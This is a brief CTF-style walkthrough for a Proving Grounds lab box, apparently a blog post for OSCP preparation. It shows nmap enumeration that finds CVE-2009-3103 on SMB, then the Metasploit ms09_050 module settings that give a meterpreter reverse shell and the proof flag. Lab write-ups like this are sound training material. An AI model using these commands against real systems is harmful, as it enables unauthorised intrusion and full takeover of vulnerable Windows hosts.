Internal — proving grounds OSCP prep(practice, easy)
This is a walkthrough for Offensive Security’s internal box on their paid subscription service, Proving Grounds.
First things first
connect to the vpn
sudo openvpn ~/Downloads/pg.ovpn
*start up target machine on proving grounds site*
set target ip to a local variable
target=”192.168.105.40"
Enumeration
Initial nmap scan
nmap $target -sV -sC -oN nmap_1
Next, we further enumerate SMB
nmap — script smb-vuln* -p 139,445 -oN smb-vuln-scan $target
Host script results:
| smb-vuln-cve2009–3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009–3103, Microsoft Security Advisory 975497)
As you can see from our NSE scripts output, there is a vulnerability we can make use of. Next, we will try to find an exploit written for this vulnerability: CVE-2009–3103
Exploitation
After several attempts at trying to use the non-metasploit exploits, I gave up and used metasploit. There were other exploits that offered RCE as well but they were poorly written and not EDB verified. The official Proving grounds write up for this box uses a metasploit exploit as well, so i suspect the talented folks over at Offensive Security had similar issues ;)
msfconsole
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS <target-ip>
set LHOST <local-ip>
run
Now, you should have a meterpreter shell.
Post-Exploitation
you should have full privileges now. You will find the flag on the administrators desktop: proof.txt
Happy hacking, good luck on your OSCP journey. if you want to see mine, checkout my Noob to OSCP vlog. If you found this guide useful please throw me some claps or a follow because it makes me happy :)